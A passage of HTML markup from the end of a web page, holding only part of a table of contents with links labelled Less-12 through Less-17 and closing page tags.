href="#Less-12"><span class="toc-number">12.</span> <span class="toc-text">Less-12</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-13"><span class="toc-number">13.</span> <span class="toc-text">Less-13</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-14"><span class="toc-number">14.</span> <span class="toc-text">Less-14</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-15"><span class="toc-number">15.</span> <span class="toc-text">Less-15</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-16"><span class="toc-number">16.</span> <span class="toc-text">Less-16</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-17"><span class="toc-number">17.</span> <span class="toc-text">Less-17</span></a></li></ol></div><!-- top--><i class="fa fa-arrow-up close" id="go-up" aria-hidden="true"></i></body></html>